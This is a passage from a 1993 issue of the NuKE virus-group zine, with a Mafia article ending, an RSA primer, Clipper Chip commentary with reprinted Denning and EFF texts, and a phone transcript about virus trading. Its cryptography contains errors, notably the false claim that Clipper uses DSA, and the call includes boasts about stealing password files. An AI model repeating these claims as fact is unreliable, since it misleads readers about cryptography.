cruelty, unfettered greed, friends in high places, and the perpetuation of
the picturesque and bogus mythology in which the Mafia's squalid operation is
gift-wrapped for hollywood and young inmates alike. The `super-boss' of this
awesome empire, on the run since 1969 and the world's most wanted man is
Salvatore `Don Toto' Riina, head of the clan from Corleone, the town that
gave its name to Francis Ford Coppola's glitzy `Godfather' clan. Riina was the
right-hand man to Luciano Liggio, who was arrested on a night in 1973 while
reading Kant's `Critique of Pure Reason' and has been imprisoned ever since.
Liggio had built up the Corleone clan, the main victors of the Mafia was of
1981-83 that left defeated clans obliged to work as clients, subject to
Corleone approval.
Riina and his partner, Bernardo Provezano, known as `The Beasts' carried out
Liggio's orders. Riina is wanted for ordering some 150 murders and is said to
have committed 40 himself. They were the founders of the empire.
Perhaps most extraordinary, Riina is the man whom authorities believe finally
subjugated the New York wing of the Mafia not only to Sicily but to his clan.
Authorities also confirm that the Corleone clan manages the affairs of the
Sicilian's long-standing colony in South America, notably in Venezuela. The
Cuntrera and Caruana families from Agrigento, are now prime managers of
South America's current cocaine surplus.
The most resent meet ever to be recorded by the authorities took place on
Valentine's Day 1989, there was a meeting at the Elysee hotel in Nice of
members of a consortium comprising the Sicilian Mafia, the giant Mafia,
the octopus, along with two divans of the Italian crime empire: the
Calabrian and the Camorra of Naples. Representatives of the Colombian and
Venezuelan cartels were also present. The outcome of this meeting was an
alliance and a carving up of the trade bringing heroin from East and
cocaine from the South America. By and large, the Sicilians kept the heroin
routes and a footheld in the white-power trade, the Calabrians won a lucrative
client role in heroin, and the Camorra emerged as the specialists in cocaine.
The Camorra's international interests span South America and Spanish and French
Rivieras. It has drug peddling bases in Holland and Germany.
For the first time, the Mafia faces a new enemy: its own subjects. The
rebellion appeared in the last few years, when Leoluca Orlando, mayor of
Palermo, promised to confront the Cosa Nostra. He _did_ expelled the Mafia
from city hall. The revolt went on, Libero Grassi, a businessman in Capo D'
Orlando, refused to pay his small protection fee; he was shot as a lesson
to others. The two judges killed (Falcone & Borsellino) provoked a street
rebellion(s), general strikes, and the biggest demonstration in Italy's
history.
The fear of violence has lead to the European Community (EC) to find back!
Europol, the European Police, until recently had been nothing more than a
harmless paper thing. But this was to change starting January 1st, 1993.
Today, Riina is located at Rebibbia prison in Rome, where interrogation has
already begun. So far, Riina has refused to cooperate with his captors, who
nevertheless say that he is behaving `with the politeness of a Sicilian that
does not exit any more. Riina was arrested in Palermo, Sicily in February,
1993. During the period of surveillance, Riina met with politicians of the
highest level, which began soon after the assassination of judge Giovanni
Falcone.
Organized crime has long operated internationally, with no boundaries, perhaps
Europol was exactly what is needed, a police force with no boundaries? And was
Europol the result of Riina being captured. Many would disagree. Nevertheless
the Mafia continues, with or without Riina.
1993 will be a dreadful year for the Mafia, it is yet to end. One of the
`Big' players is gone, Riina, what happens now?
"L'appetito viene mangiando"
Translation: Eating makes you hungry.
The Mafia, already fed to bursting, remains very hungry indeed.
================================================================================
�================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "Rivest, Shamir, Adleman, (RSA) Encryption" -N
E- Nu
-N uK
Nu By KE
uK Rock Steady E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
Ahh, the last NuKE Informational Journal #5, concerning DES Encryption brought
about a fair amount of generous reviews. It has even inspired me to continue
this topic of `Digital Security' hence forth I introduce to you RSA. Rivest,
Shamir, Adlemen (RSA) are the three mathematicians whom have patented the idea
of `Public-Key' encryption, which by far isn't `just another' encryption
method.
Public-Key crypto-systems are often referred to as `asymmetric' crypto-systems. The
now famous DES is of a form of `symmetric' crypto-systems. Symmetric, consists
the use of a single key for decrypting and encrypting. Asymmetric on the other
hand, consists of two keys; a public key used to encrypt, and a private key
used to decrypt the cipher. (Cipher, is data that is encrypted)
RSA algorithm work on the idea that prime numbers cannot be broken into a
product of smaller factors. The algorithms work like so; first pick a number
N that is the product of two prime numbers (call the two primes a and b so
that N = a x b). Next, pick a number that will become your public key, and
call it P; P _must_ be less than N. Now to encrypt a message M, you simple
apply the following formula:
C=M^P(mod N)
% What the hells `mod'? %
Public-key crypto-systems depend heavily on a number theory known as modular
arithmetic or finite math. "Mod" can be said to be a remainder of a number.
13 mod 5 = 3, since that's the remainder when 13 is divided by 5. But the
theory of Modular Math contains a pattern, a range, depending on the modular
numbers. The modular of 50, are numbers from 0, 1, 2, ..., 49; the smallest
being 0, and the largest is the modulus number minus 1.
A less formal and probably easier-to-visualise is called the `clock arithmetic'
If you restrict yourself to performing math by moving the hour hand clockwise
(addition) or counterclockwise (subtraction) around the face of a clock, you'll
soon see obvious patterns. Mostly, no matter how complex the math is, your
answer will _always_ be some number in the range of 1 to 12, which are the
number of hours on a standard clock. This actually is the basis of `finite'
mathematics, whereby you are always working with integers and you're always
working with a finite set of integers.
Therefore, results of addition, subtraction, multiplication and division
will _always_ land in the set defined by the modulus. (huh? how can that be?)
As with the clock theory, the numbers "wrap around", meaning if the modular of
50 is a set of integers from 0 -> 49, once we reach 49 (the largest number) and
add 1, we would get 0. The number 49 will wrap around to 0, and the reverse is
true (0 wraps around to 49).
The great think about modular math, is that it's finite, you don't have to worry
about calculations yielding numbers that grow out of control, and also, since
we are working with integers, you don't lose any information through round-off
errors as you would with floating-point.
Back to our formula;
C=M^P(mod N)
where C is the encrypted message, notice the message will be represented as
numbers, you can use the ASCII value of each characters. See it's not hard to
find two large prime numbers (a and b) but if I hand you their product (N), you
will perhaps never find a and b again! So in RSA, you get a huge 512-1024 bit
prime number which is the product of two large primes, a and b. The number N is
made public, while a and b remains secret. And after the formula is completed
the encrypted message cannot be cracked without factoring N!
Now to decrypt the message we use the some-what same formula with different
factors;
M=C^p(mod N) (Note: This is lower case `p')
where `p' (lower case) is the secret key. The secret key is calculated using
the formula;
P x p = 1(mod L)
where L is the least common multiple of (a-1) and (b-1). In mathematical
terminology, `p' is the multiplicative inverse of `P' in the modulus L.
Algorithms are available for computing least common multiples and
multiplicative inverses in modular arithmetic. You can look-up theses formulas
for more understanding in almost any good college mathematic book, as I cannot
teach you math in a matter of paragraphs. But I suspect most of the readers
already know such basic mathematical skills.
Anyhow, RSA has undergone quite a bit of research around its algorithm.
Breaking the system requires the determination of `a' and `b', which are
the factors of `N' (don't forget `N' and `P' are publicly known). Once you
know `a' and `b', the factors of `N', you can easily calculate L. Knowing L
and P, you can calculate `p' (lower case), and decrypt the ciphertext. This
boils down to the task of factoring a number into its prime components, an
ongoing popular problem in number theory that continues to occupy the minds
and computers of mathematicians around the world.
In October 1988, it took an international group of computer scientists nearly
a month to factor a 100-digit number. More than 400 computers worked on the
problem during idle hours to find the number's two factors. One 41 digits long,
the other 60 digits long. In June 1990, another team factored a 155-digit
number. The number was hand-picked to make the task easier, but it still took
275 years worth of ONE computer's time. To keep pace with even-faster computers
RSA's inventors can simply add more digits to the system's key.
================================================================================�================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "Clipper Chip : New Government Standard? -N
E- or New Government Joke?" Nu
-N uK
Nu By KE
uK NuKE Supporters E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% New Government Standard or Joke? %
Since the beginning of the new year, we have been waiting to hear from NIST
if it will decide whether DES will remain as the standard encryption method
used by federal agencies.
The computer industry would like NIST to adopt the RSA technology, but that
is not likely to happen. One reason; if RSA, a privately developed technology,
becomes the new standard, the government will have to pay royalties for its
use. And _even_ more important, the NSA does not want the government to back
RSA encryption system. Why?
"The NSA dislikes our system because its too hard to break!"
"They clearly don't like what we do, but we're succeeding in spite of that."
Are quoted statements explained by James Bidzos, president of RSA Data Security.
And frankly, this is very true. RSA has been developed in the 1978, more that
15 years ago! After so many years of resisting Public-Key encryption systems,
the government _finally_ endorsed one as a new National Standard!
Unlike RSA, however, the government's DSA (Digital Signature Algorithm) depends
on a single government-issue _prime number_. Where's the trust? I stated this
in the previous info-journal, that the NSA would _never_ introduce an encryption
system that is unbreakable, by them! The `Clipper Chip' uses the known to exist
government's DSA system.
What the government is saying is this: "Take a P! Not any P! this P!" (Read
Article concerning RSA to understand RSA public-key algorithms) What good is it
if we are `tricked' to use a P (prime number(s)) that the government issues? It
only means that the government (NSA) wants the cipher to be, perhaps,
unbreakable to the average public. But if NSA wishes to un-cipher your cipher,
and you are using this government standard, it can _easily_ do so with easy.
Its not that you don't trust anybody, its that you don't trust everybody. And
`everybody' includes the government! Why should we let the government get the
upper hand, again! We got exploited the first time with DES, and now its trying
to do the exact same all over again.
% Clipper Released %
I take into grant that everybody has read the document on the Clipper Chip,
that was release by The White House, office of the press secretary. If not; you
may obtain a copy by calling up a NuKE-NeT system and looking through old
messages posted in the General message base. Or you can get the file via an
anonymous file transfer (ftp site) from csrc.ncsl.nist.gov in directory
/pub/nistnews and via the NIST Computer Security BBS at 301-948-5717.
A copyrighted article in the Friday May 7th, 1993 `Washington Post' describes
a letter sent to President Clinton by 30+ major electronics companies and trade
associations, expressing their concern about the Clipper chip. The article
describes what the Clipper chip is, and explains that it was developed to allow
encryption of voice and fax with a method for law enforcement to listen in when
authorized. It summarizes the key aspects of the chip, and says:
Since the White House proposed the plan three weeks ago, many in the
computer and communications industries have responded with scepticism.
Critics wonder how good the secret government technology really would
be and worry that agencies might abuse it to tap calls without court
orders.
A NIST spokesman said they haven't read the letter yet, but commented that
Clinton has made it clear he wants industry participation.
Signers of the letter include IBM, AT&T, Lotus, Microsoft, McCaw Cellular and
MCI, as well as the ACLU. The article notes the apparent conflict between
AT&T signing the letter and its stated intention to use the chip. AT&T response
was that they're just seeking clarification and do not oppose Clipper.
Lets take into grant on the structure of Clipper and DES. DES differential
cryptanalysis give you an 2^56 (56 bit key) rippling back through 16 stages.
Clipper is said to use 32 rounds, where the key is extended to 2^80 (80 bits).
Current personal computer desktop allows forced attacks of up to 2^50. This
means that 2^80 for brute force key search is clearly unpractical for a few
years to come.
When DES was named as the standard 20 years ago, we clearly knew that the
algorithms relied more on the S-boxes structure than on the key input. Enabling
NSA to have a `backdoor' on DES, and the upper-hand in crypto technology.
Clearly whatever computer power the NSA had 20 years ago, is surely _more_
power or equal power to what most desktop computers can do today. So surely,
an 80 bit key can be easily broken via brute force attacks in perhaps the next
1-2 following years. But does the NSA contain an advantage that can `instantly'
decipher the cipher code? If it depends on the government's DSA issue prime
numbers, certainly that power exists. The movies `Sneakers' hints this issue,
and we regard it as SciFi, fiction, entertainment purposes only! Look deeper,
a lot deeper, isn't it hinting this theory exactly?
I leave you with a technical summary of the Clipper Chip by Dorothy Denning,
and a EFF analysis of the proposed Clipper Chip. Theses articles are
distributed along the `As-is' basis, as that is how they were both publicly
posted inside Internet Newsgroups. (sci.crypt)
% The Clipper Chip : A Technical Summary %
Newsgroups: sci.crypt
Subject: THE CLIPPER CHIP: A TECHNICAL SUMMARY
Date: 19 Apr 93 18:23:27 -0400
Distribution: world
Organization: Georgetown University
The following document summarizes the Clipper Chip, how it is used,
how programming of the chip is coupled to key generation and the
escrow process, and how law enforcement decrypts communications.
Since there has been some speculation on this news group about my
own involvement in this project, I'd like to add that I was not in
any way involved. I found out about it when the FBI briefed me on
Thursday evening, April 15. Since then I have spent considerable
time talking with the NSA and FBI to learn more about this, and I
attended the NIST briefing at the Department of Commerce on April
16.
The document below is the result of that effort.
Dorothy Denning
---------------
THE CLIPPER CHIP: A TECHNICAL SUMMARY
Dorothy Denning
April 19, 1993
INTRODUCTION
On April 16, the President announced a new initiative that will
bring together the Federal Government and industry in a voluntary
program to provide secure communications while meeting the
legitimate needs of law enforcement. At the heart of the plan is
a new tamper-proof encryption chip called the "Clipper Chip"
together with a split-key approach to escrowing keys. Two escrow
agencies are used, and the key parts from both are needed to
reconstruct a key.
CHIP STRUCTURE
The Clipper Chip contains a classified 64-bit block encryption
algorithm called "Skipjack." The algorithm uses 80 bit keys
(compared with 56 for the DES) and has 32 rounds of scrambling
(compared with 16 for the DES). It supports all 4 DES modes of
operation. Throughput is 16 Mbits a second.
Each chip includes the following components:
the Skipjack encryption algorithm
F, an 80-bit family key that is common to all chips
N, a 30-bit serial number
U, an 80-bit secret key that unlocks all messages encrypted with
the chip
ENCRYPTING WITH THE CHIP
To see how the chip is used, imagine that it is embedded in the
AT&T telephone security device (as it will be). Suppose I call
someone and we both have such a device. After pushing a button to
start a secure conversation, my security device will negotiate a
session key K with the device at the other end (in general, any
method of key exchange can be used). The key K and message stream
M (i.e., digitized voice) are then fed into the Clipper Chip to
produce two values:
E[M; K], the encrypted message stream, and
E[E[K; U] + N; F], a law enforcement block.
The law enforcement block thus contains the session key K encrypted
under the unit key U concatenated with the serial number N, all
encrypted under the family key F.
CHIP PROGRAMMING AND ESCROW
All Clipper Chips are programmed inside a SCIF (secure computer
information facility), which is essentially a vault. The SCIF
contains a laptop computer and equipment to program the chips.
About 300 chips are programmed during a single session. The SCIF
is located at Mikotronx.
At the beginning of a session, a trusted agent from each of the two
key escrow agencies enters the vault. Agent 1 enters an 80-bit
value S1 into the laptop and agent 2 enters an 80-bit value S2.
These values serve as seeds to generate keys for a sequence of
serial numbers.
To generate the unit key for a serial number N, the 30-bit value N
is first padded with a fixed 34-bit block to produce a 64-bit block
N1. S1 and S2 are then used as keys to triple-encrypt N1, producing
a64-bit block R1:
R1 = E[D[E[N1; S1]; S2]; S1] .
Similarly, N is padded with two other 34-bit blocks to produce N2
and N3, and two additional 64-bit blocks R2 and R3 are computed:
R2 = E[D[E[N2; S1]; S2]; S1]
R3 = E[D[E[N3; S1]; S2]; S1] .
R1, R2, and R3 are then concatenated together, giving 192 bits. The
first 80 bits are assigned to U1 and the second 80 bits to U2. The
rest are discarded. The unit key U is the XOR of U1 and U2. U1
and U2 are the key parts that are separately escrowed with the two
escrow agencies.
As a sequence of values for U1, U2, and U are generated, they are
written onto three separate floppy disks. The first disk contains
afile for each serial number that contains the corresponding key
part U1. The second disk is similar but contains the U2 values.
The third disk contains the unit keys U. Agent 1 takes the first
disk and agent 2 takes the second disk. The third disk is used to
program the chips. After the chips are programmed, all information
is discarded from the vault and the agents leave. The laptop may
be destroyed for additional assurance that no information is left
behind.
The protocol may be changed slightly so that four people are in the
room instead of two. The first two would provide the seeds S1 and
S2, and the second two (the escrow agents) would take the disks
back to the escrow agencies.
The escrow agencies have as yet to be determined, but they will not
be the NSA, CIA, FBI, or any other law enforcement agency. One or
both may be independent from the government.
LAW ENFORCEMENT USE
When law enforcement has been authorized to tap an encrypted line,
they will first take the warrant to the service provider in order
to get access to the communications line. Let us assume that the
tap is in place and that they have determined that the line is
encrypted with Clipper. They will first decrypt the law
enforcement block with the family key F. This gives them E[K; U]
+ N. They will then take a warrant identifying the chip serial
number N to each of the key escrow agents and get back U1 and U2.
U1 and U2 are XORed together to produce the unit key U, and E[K; U]
is decrypted to get the session key K. Finally the message stream
is decrypted. All this will be accomplished through a special
black box decoder operated by the FBI.
ACKNOWLEDGMENT AND DISTRIBUTION NOTICE. All information is based
on information provided by NSA, NIST, and the FBI. Permission to
distribute this document is granted.
-------------------------------------------------------------------------------
% EFF Analysis of the Clipper Chip %
April 16, 1993
INITIAL EFF ANALYSIS OF CLINTON PRIVACY AND SECURITY
PROPOSAL
The Clinton Administration today made a major announcement
on cryptography policy which will effect the privacy and security of
millions of Americans. The first part of the plan is to begin a
comprehensive inquiry into major communications privacy issues
such as export controls which have effectively denied most people
easy access to robust encryption as well as law enforcement issues
posed by new technology.
However, EFF is very concerned that the Administration has
already reached a conclusion on one critical part of the inquiry, before
any public comment or discussion has been allowed. Apparently, the
Administration is going to use its leverage to get all telephone
equipment vendors to adopt a voice encryption standard developed
by the National Security Agency. The so-called "Clipper Chip" is an
80-bit, split key escrowed encryption scheme which will be built into
chips manufactured by a military contractor. Two separate escrow
agents would store users' keys, and be required to turn them over
law enforcement upon presentation of a valid warrant. The
encryption scheme used is to be classified, but they chips will be
available to any manufacturer for incorporation into their
communications products.
This proposal raises a number of serious concerns .
First, the Administration appears to be adopting a solution
before conducting an inquiry. The NSA-developed Clipper chip may
not be the most secure product. Other vendors or developers may
have better schemes. Furthermore, we should not rely on the
government as the sole source for Clipper or any other chips. Rather,
independent chip manufacturers should be able to produce chipsets
based on open standards.
Second, an algorithm can not be trusted unless it can be tested.
Yet the Administration proposes to keep the chip algorithm
classified. EFF believes that any standard adopted ought to be public
and open. The public will only have confidence in the security of a
standard that is open to independent, expert scrutiny.
Third, while the use of the split-key, dual-escrowed
system may prove to be a reasonable balance between privacy and
law enforcement needs, the details of this scheme must be explored
publicly before it is adopted. What will give people confidence in the
safety of their keys? Does disclosure of keys to a third party waive
individual's fifth amendment rights in subsequent criminal
inquiries?
In sum, the Administration has shown great sensitivity to the
importance of these issues by planning a comprehensive inquiry into
digital privacy and security. However, the "Clipper chip" solution
ought to be considered as part of the inquiry, not be adopted before
the discussion even begins.
DETAILS OF THE PROPOSAL:
ESCROW
The 80-bit key will be divided between two escrow agents, each of
whom hold 40 bits of each key. Upon presentation of a valid
warrant, the two escrow agents would have to turn the key parts
over to law enforcement agents. Most likely the Attorney General
will be asked to identify appropriate escrow agents. Some in the
Administration have suggested one non-law enforcement federal
agency, perhaps the Federal Reserve, and one non-governmental
organization. But, there is no agreement on the identity of the agents
yet.
Key registration would be done by the manufacturer of the
communications device. A key is tied to the device, not to the person
using it.
CLASSIFIED ALGORITHM AND THE POSSIBILITY OF BACK DOORS
The Administration claims that there are no back door means by
which the government or others could break the code without
securing keys from the escrow agents and that the President will
be told there are no back doors to this classified algorithm. In order
to prove this, Administration sources are interested in arranging for
an all-star crypto cracker team to come in, under a security
arrangement, and examine the algorithm for trap doors. The results
of the investigation would then be made public.
GOVERNMENT AS MARKET DRIVER
In order to get a market moving, and to show that the government
believes in the security of this system, the feds will be the first big
customers for this product. Users will include the FBI, Secret Service,
VP Al Gore, and maybe even the President.
FROM MORE INFORMATION CONTACT:
Jerry Berman, Executive Director
Daniel J. Weitzner, Senior Staff Counsel
Internet Address: eff@eff.org
===============================================================================
�================================================================================
Volume 1, Issue 6, May 1993
NuKE Info-Journal #6
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "Lies, Scandals, and Roomers of the Anti- -N
E- Virus Community" Nu
-N uK
Nu By KE
uK Alan Soloman, ARiSToTLe, Rock Steady E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
The following are the _exact_ conversation/interview between Aristotle,
Rock Steady, and Alan Soloman, concerning the virus problem of today. The
conversation was recorded by Rock Steady, the NSA (naturally), and Unitel whom
alerted the RCMP because this was a 5 hour conference billed onto NuKE's own
PBX, whom Unitel thought was suspicious so they killed our PBX! (Gezz talk about
trust!) Nothing here has been recreated, this conversation was recorded on
tape, rather in bad quality though, but nevertheless it will stand against any
accusation of fabrication, which it is not!
PS: Don't forget to read the conclusion at the end of the coversation, if you
must read one thing, may it be the conclusion.
% In the Beginning... there was light, then Rock, and of course Aristotle %
NOTE: RS=Rock Steady ; AR=Aristotle ; SO=Alan Soloman ; ??= Mrs ?
??> Hello, may I help you?
AR> Alan Soloman Please.
??> Who's calling?
AR> John
<Pause>
SO> Hello?
AR> Hi, how you doing? If your not busy, ah.. you know Rock Steady is here on
the phone with me.
SO> Yeah
AR> And I wanted to ask you a couple of things if I could.
SO> Yeah
AR> That article came out in VNI. [Virus News International; its a magazine]
SO> Which one
AR> The one that came out in the May issue.
SO> Yeah
AR> Who's the author of that?
SO> Which article are you talking about?
AR> The one that says `Back in Business'
SO> ah, I don't know which is the article you are referring to.
AR> ah, John <Censored>, also known publicly as-
SO> The trouble is ah, its been a few weeks since I read it. Does it have an
author to it?
AR> No.
SO> Then its written by the editor.
AR> Its written by Paul, okay I've talked to Paul about it. Okay I've twice seen
in there whereby you have written articles and tossed me into it.
SO> Toss you into what?
AR> ah a couple of articles where you mention my name.
SO> Did I say anything that wasn't true?
AR> ah, that's not what I'm getting at. That's not what I'm calling about.
What I'm calling about, is this particular article where they mention the
school and everything.
SO> Yeah
AR> I spoke to Paul the other day, and he sent me a copy in the mail.
SO> Yeah
AR> So I was wondering, is there going to be a retraction on it?
SO> Is it not true then?
AR> Na-
RS> What right gives you-
SO> But you told me you were a student at-
AR> No, no, no, about being Back in Business. It stated three times that I
publicly stated that I was closing my system.
SO> Well I'm confused-
RS> That's a start
SO> ah, I got a fax, no its an email, I forget now, this was a few months ago.
Were you were offering viruses for sale. Is that not the case?
AR> Na, that's not the case.
SO> Something you posted on Fidonet.
AR> I didn't know that I posted it!
SO> Its good forgery, if its not you that did this.
AR> Well, my points is-
SO> Want me to call you back, this is costing you a fortune.
AR> That's okay I can handle it. [Yeah sure RS is paying this 3-way]
RS> <grins>
AR> Reason I had Rock Steady call was, we were talking 'bout this as well. ah-
SO> When I talk about your position, the position is that your positioned in
William & Mary's college, or you graduated?
AR> I graduated!
SO> So your no longer with the college.
AR> I graduated from the college, ah after this issue came out. But the point
of it is this, it states in here real clearly that I'm Back in Business!
And that I have forgotten my pledge, kay! I think I went back into business
when I change to VR, there's nobody on my board!
SO> So your not offering viruses any more?
AR> I haven't since that day I told you. See I have ten people, believe or not,
their all AV.
SO> Who are there.
AR> <CENSORED> has some boys that like to call me from time to time.
SO> What do you mean `his boys'
AR> Some people he's got working for him. They call me up.
SO> The trouble is, I don't know what you mean by the AV.
AR> Well AntiVirus researchers, people that do beta testing for AntiVirus
software.
SO> The trouble is, anyone can call and say their AV.
AR> Well okay, anybody can call themselves a virus writer. I', pr-
SO> Ththth-that's why I'm asking you-
AR> I'm really pissed off about this, okay. The way they mention my name in
there, okay, they basically came out and said I was fire! This guy on the
phone right now, knows for a fact that I've been doing research for this
crap for a year now. And a-
SO> Sorry, this guy you say, you mean Joe? [Joe Greco aka Rock Steady]
AR> Yeah, okay... Joe?
RS> Yeah
AR> okay, anyway this stuff has been going on you know, and its been nothing
but research. I told Paul Robison to call the school! And formally request
that article and he can have it.
SO> What's the phone number.
AR> ah, okay, ah area code 804-221-4000 is the main number.
SO> And who is the article with.
AR> ah, Kenny Chang
SO> So who's posting all the messages saying your selling viruses?
AR> I don't know.
SO> Because they seem to be coming-
AR> Well I'll tell yeah
RS> Do you have those posts we'd like to see them.
SO> I could faxed them to you. Gimme a fax number
AR> I don't have a fax number
RS> Well I'm unwilling to give you my fax number.
SO> Well I received them as a fax.
AR> Well that's my point, the school is rather pissed off about this as well.
SO> Allow me to fax them too?
AR> well I dunno, if somebody's posting out there, I can take and change my
system right now. I can phreak one of these password files from any front-
door, and when I get in, I can get anybody's session password, and change my
damn fido feed to anybody in the world.
RS> Are to willing to receive a copy from the mail Aristotle, yes or no?
AR> Sure I'll take a copy by the mail.
RS> or I can make him send it the NuKE PO Box.
AR> Sure, that's fine.
RS> Okay Alan, I call you back in a week to give you our PO Box to receive
that fax.
SO> I could do that
AR> Yeah, I'd like to have that. Now here's what it is...okay...I've been
looking at this stuff upside down, and one-the-other, and there's a whole
lot of thinks I was unhappy about. Alan I'm really pissed about this one.
SO> What are you pissed about?
AR> What am I pissed about! Damn Alan, you know. For a year know everyone knows
that I'm here straighten this crap out. Between Sara Gordan's posting out
there about VX-Net being an underground exchange network, and all this kind
of horse-shit and everything. And this article coming out here, saying I'm
a student in this school, now why did you have to put that in there?
SO> Well because, what you say, was that you were doing this project.
AR> But nobody mentioned that!
SO> You said that!
AR> But in the article it doesn't say anything about this damn research thing!
The only thing that is said is that I'm a student at William and Mary's,
It doesn't mention the fact that I'm doing research for the school!
RS> Of course it all ends up that they pick out what they want, and paint a
different picture of you!
AR> I've always been pretty straight with you. You know Sara Gordon walks
around saying, "I'll never log on to a bulletin board, never, never, never!"
[Meaning a `Virus' exchange bulletin board]
SO> Its been a few weeks since I read that article, can I call you back while I
go get a copy of this article. Wait, I'll see if I can get it...
<short pause>
SO> Sorry, I can't seem to find a copy in the house. See you called me at home,
rather than the office. What did the article say?
AR> It said, "John <Censored>, also known publicly under the name Aristotle,
sysop of The Black Axes BBS. One of several names used my Mr. John,
recently announced, the self-imposed shut down of his bulletin board
system. For a while it looked like there would be no more viruses for
sale, or given away free, depending on who you were! ..... John's a
student at William and Mary's college, has apparently forgotten his
pledge and is back in business!
AR> Now then, there's a hole lot of people here running around, saying all sorts
of things. Lemme ask you something, a lady under the name Katy, no, Cary
something.
SO> Cary, Cary Lang?
AR> Yes, she says she works for you! ok?
SO> Not quite true.
AR> Well she also states she was on my board, and she from Finland!
SO> Well, Cary Lang is finish, doesn't work for me, works for a company, called
"Land Vision"
AR> Same place with that guy `Dire', Kaluco Janhontalo or something like this.
Now this lady (Cary), was posting in the echoes, in response to some letter
saying `John's boards down you know...' She comes out and says, "NO, its up,
plenty of viruses, I was on there today." She used in her tag line, "Works
for Dr. Alan Soloman"
SO> Let me give you the accurate information on Cary, Cary isn't a lady, Cary is
a man.
AR> Pardon me.
SO> Secondly, he works for a company called Land Vision, and sell our AntiVirus
toolkit.
AR> Well that lady-
SO> He's not a lady.
AR> Well okay, that person-
SO> MAN
AR> okay, that man was never on my board, the only fidish person on my board,
is that guy named Janhontalo, okay.
SO> Doesn't ring a bell.
AR> Well, I'm kinda disturbed but it, cuz I believe when the school kicks back
up, and they read this, huh.... The only person that knows about this right
now is the dean.
SO> Well I think, that if certain of my views were not true, then certainly we
would do a retraction.
AR> The chancellor of the college will be, very shortly, Margaret Thacher.
SO> Really?
AR> Oh Yes! She'll be the chancellor of the 1st of July, 1993.
SO> So what is the true situation? So what you said was, that you took the
Black Axes down?
AR> No! What I said was the virus exchange, the virus stuff, is down!
SO> So the Black axes is still running?
AR> Yes.
SO> Do you have any viruses on it?
AR> For download, NO. There are 10 people that have access to that, on my board.
SO> So there are no viruses for download?
AR> Only 10 people have access to that, on my board!
SO> Who are they?
AR> ah, sure if you wanna do that, sure! You want me to name who's on there?
SO> Yeah.
AR> Some of these people are going to be mighty upset! These are AntiVirus
software people. Joe knows these people call, I know when he writes
something he doesn't go off to these people and tell them...
AR> You know many don't trust my judgment, on whom I give theses viruses to, is
what this all comes down to. How come then so many of my viruses have the
S & S International logo in them?
SO> Frankly, I'd like to know that too. [S&S International is Solomans Company.]
AR> Well I already got the connection made! Well we've talked about David Chess,
and he is suspected with trading with McAfee.
SO> Suspect is the wrong word, I think he does!
AR> Alright then, also we have a fellow by the name of Joseph Whales. Joe Whales
is good buddies with guys in the NCSA, I got the whole NCSA collection!
I got everything David Stang has put his hands on!
SO> Most of it is junk, you know that! [NCSA Virus Collection]
AR> Well there is more in there than just junk.
SO> That's true, I'm not saying its all junk. I keep seeing these files
beginning with exclamation marks, going round, and round, and round.
AR> I got the entire collection, I got 8 megs of junk!
SO> That's nothing I got 110 megs of junk. [Glad to see your proud of it!]
AR> Now then, this guy on the phone with me right now (Joe) doesn't write
viruses to put on peoples systems and NuKE the whole world! That's _not_
what we both do. I'm just interested in where they go, and what disturbs
me is all the people running around out there, claiming this `Big Threat'
You even stated in your articles that many in my collection were viruses,
but there was an afoul lot of junk.
SO> Yes, that right.
AR> True, no problem with that. But that's the representative of what's going
around the country! See, this is what is represented on what's out there.
And its not that big a threat!
SO> Its not that big of threat, for what?
AR> ARCV is being busted and charge for some viruses they didn't write Alan!
SO> Which viruses?
RS> All of them!
AR> Well they didn't write the McWhale, or the KoolMac...
SO> Why do you say they're being busted for those viruses?
AR> Because it listed in an article, by someone up there in Scotland Yard,
saying if anybody got infected by any of these viruses, to contact them!
SO> I don't know where Scotland Yard got the idea they wrote McWhale, I could
have told them that!
AR> All of them are MPC viruses, nothing more.
SO> Well wait a minute, it depends on whom you believe is a member of ARCV!
AR> Do they think I'm a member of ARCV?
SO> Well Apache Warrior has been telling them that you are!
AR> Hah, I'm in the United States, and your telling me I'm a member of ARCV!
RS> ARCV is SOLELY England
SO> Well that's what he has been telling them! Ask Apache Warrior.
AR> Well I didn't know this.
SO> Yes you did!
AR> That I've been a member of ARCV?
SO> You knew his been saying that!
RS> Since when, do you want to clarify this.
SO> Since when what?
RS> You say John knows, what makes you so sure?
SO> Because the last time I spoke to John 2-3 months ago..
AR> I know we talked about him, and I know he narced all his friends! But I
don't think you told me, that he said I was a member of ARCV!
RS> Alan do you have a copy of the ARCV news-journal? Their first news journal
and only news journal, all members are listed inside there, and Aristotle
is not listed inside there.
SO> Do you have a copy of the second journal?
RS> The second journal was never released.
SO> ah, John's got a copy.
AR> Of the Second Journal?
RS> The second journal does not exist.
SO> John's got a copy.
AR> Tell me which one its in now, and I'll look it up! Is it in the collection
I sent you?
SO> Yeah.
AR> Does it have me listed in that?
SO> No, it doesn't.
AR> This why I keep hearing feedback, of people wanting to extradite me to
england.
SO> Possibly, I can well imagine.
AR> Based on what a 19 year old phreaker has said. And also now, with my name
going around being `Back in Business'...
SO> Well I don't know what he's basing that claim with, if he's got any files,
or anything. I don't know. What I do know is that six months ago, he was
facing fairly big trouble.
AR> And because he's been talking... well you know...
SO> He was facing big trouble, because he got caught stealing large amounts
of telephone time from his next door neighbour. In an extraordinary stupid
manner, by the way.
AR> Yeah I know, he just went backdoor and plug a phone line into it...
SO> There's no way he could of gotten away with that.
AR> Humm, interesting. So how can I get Scotland Yard to call me?
SO> You can call them, I'll give you the phone number.
AR> Naa, wouldn't do any good. So like once this trail starts, they may bring
me over?
SO> I don't know, you can send them a letter. The person in charge of the case
in Scotland Yard is, Inspector John Hoston.
AR> humm okay.
